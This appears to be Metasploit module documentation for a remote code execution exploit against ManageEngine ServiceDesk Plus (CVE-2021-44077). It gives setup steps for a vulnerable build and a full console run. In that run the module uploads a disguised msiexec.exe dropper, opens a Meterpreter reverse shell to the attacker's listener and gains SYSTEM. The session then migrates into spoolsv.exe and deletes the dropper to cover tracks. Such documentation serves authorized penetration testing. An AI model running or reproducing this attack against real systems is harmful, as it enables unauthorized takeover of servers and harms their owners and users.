## Vulnerable Application

### Setup

Follow the [Installing ServiceDesk Plus] guide, in particular [Installation on Windows]. You can skip licensing.

1. Download [ManageEngine_ServiceDesk_Plus_64bit.exe]
1. Run the installer
1. Start the server
1. Hax

Note that build 11305 is not an exploitable build, so don't download that.

[Installing ServiceDesk Plus]: https://help.servicedeskplus.com/installing-servicedesk-plus
[Installation on Windows]: https://help.servicedeskplus.com/introduction/installation-and-getting-started.html
[ManageEngine_ServiceDesk_Plus_64bit.exe]: https://archives.manageengine.com/service-desk/11301/ManageEngine_ServiceDesk_Plus_64bit.exe

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

## Scenarios

### ServiceDesk Plus 11301 on Windows Server 2016

```
msf6 > use exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
[*] Using configured payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > options

Module options (exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST                        yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Dropper


msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set rhosts 172.16.57.222
rhosts => 172.16.57.222
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set lhost 172.16.57.1
lhost => 172.16.57.1
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > run

[*] Started reverse TCP handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /RestAPI/ImportTechnicians is present.
[*] Uploading msiexec.exe
[+] Successfully uploaded msiexec.exe
[*] Executing msiexec.exe
[!] Yo, don't forget to clean up ..\bin\msiexec.exe
[*] Meterpreter session 1 opened (172.16.57.1:4444 -> 172.16.57.222:50095 ) at 2021-12-23 11:28:47 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-PRMQDT3BCJI
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > pwd
C:\Program Files\ManageEngine\ServiceDesk\site24x7
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 4816 to 1728...
[*] Migration completed successfully.
meterpreter > rm 'C:\Program Files\ManageEngine\ServiceDesk\site24x7\..\bin\msiexec.exe'
meterpreter >
```
